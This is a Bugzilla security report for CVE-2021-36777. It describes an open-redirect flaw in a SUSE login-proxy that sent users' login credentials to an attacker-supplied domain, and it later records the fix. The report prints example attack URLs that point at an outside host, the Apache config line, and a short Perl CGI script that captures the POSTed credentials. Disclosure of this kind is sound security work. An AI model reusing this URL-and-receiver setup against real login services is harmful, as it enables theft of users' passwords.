Bugzilla – Bug 1191209
VUL-0: CVE-2021-36777: login-proxy sends password to attacker-provided domain
Last modified: 2022-02-23 09:55:45 UTC
When authenticating various SUSE and openSUSE services, we use a login-proxy so that the services themselves do not get to see user passwords. Today, tiggered by darix and Victor Pereira, I investigated issues about redirecting to attacker-provided URLs. I found that the login-proxy can send the credentials (filled by users into the login form) to an attacker-provided server. Example attack URL: https://build.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/ On the server side is an apache (with a valid SSL cert for https) with a config line ScriptAlias /ICSLogin/auth-up /usr/lib/cgi-bin/testpost pointing to this script #!/usr/bin/perl -w use strict; use CGI ":standard"; print header("text/plain"); if($ENV{REQUEST_METHOD} eq "POST") { print "\n\nPOST params:\n"; foreach(param()) { print "$_=".param($_)."\n"; } } also affected: https://hackweek.suse.com/ICSLogin/auth-up/?url=http://www.zq1.de/ https://build.suse.de/ICSLogin/auth-up/?url=http://www.zq1.de/ not affected: https://en.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/
Please use CVE-2021-36777 for this
The appliance is not affected. the proxy code is only used on our infra. the bad part that allowed affecting the form via url param is already patched out. the general removal of the url param needs testing.
https://gitlab.suse.de/buildops/login-proxy-scripts/-/commit/d0b45f98fc74b254ee0585f26647cb6c8d2c871f by darix fixed this CVE-2021-36777
making public. Fix is available and deployed